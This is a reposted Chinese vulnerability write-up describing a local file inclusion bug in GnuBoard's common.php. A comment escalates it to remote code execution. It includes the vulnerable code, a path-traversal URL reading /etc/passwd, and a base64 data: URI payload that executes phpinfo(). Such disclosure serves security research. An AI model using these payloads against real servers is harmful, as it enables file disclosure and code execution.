GnuBoard本地文件包含漏洞+远程代码执行漏洞 's

admin 2017年5月4日20:30:09评论985 views字数 1003阅读3分20秒阅读模式
摘要

作者: Flyh4tGnuBoard是韩国比较常见的一个论坛,存在较多的漏洞,其中common.php存在一个文件包含漏洞
看common.php代码

作者: Flyh4t

GnuBoard是韩国比较常见的一个论坛,存在较多的漏洞,其中common.php存在一个文件包含漏洞
看common.php代码

@extract($_GET); @extract($_POST); @extract($_SERVER);   ……  if (!$g4_path || preg_match("/://///", $g4_path))     die("<meta http-equiv='content-type' content='text/html; charset=$g4[charset]'><script language='JavaScript'> alert('肋给等 规过栏肺 函荐啊 沥狼登菌嚼聪促.'); </script>");   //if (!$g4_path) $g4_path = ".";  $g4['path'] = $g4_path; //只限制了$g4_path不能有字符 ://  unset($g4_path);  include_once("$g4[path]/lib/constant.php");  //本地文件包含漏洞 include_once("$g4[path]/config.php"); include_once("$g4[path]/lib/common.lib.php"); 

poc(鬼仔注:请自行去除poc中的那个空格,不加空格的话我这里发不出去,会被ModSecurity给返回501错误)

http://test.com/GnuBoard/common.php?g4_path=../../../../../../../e tc/passwd%00

————鬼仔注:下面的是二楼说的—————-

q1ur3n:
在Ryat牛的提示下,这个本地包含晋升为远程代码执行漏洞。
bypass_local.php

<?php if (!$g4_path || preg_match("/://///", $g4_path))     die("fuck"); $g4['path'] = $g4_path; unset($g4_path); include_once("$g4[path]/lib/constant.php"); ?>

在allow_url_include = On且PHP >= 5.2.0的条件下
提交bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo=
成功执行phpinfo()

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月4日20:30:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GnuBoard本地文件包含漏洞+远程代码执行漏洞 'shttps://cn-sec.com/archives/46004.html

发表评论

匿名网友 填写信息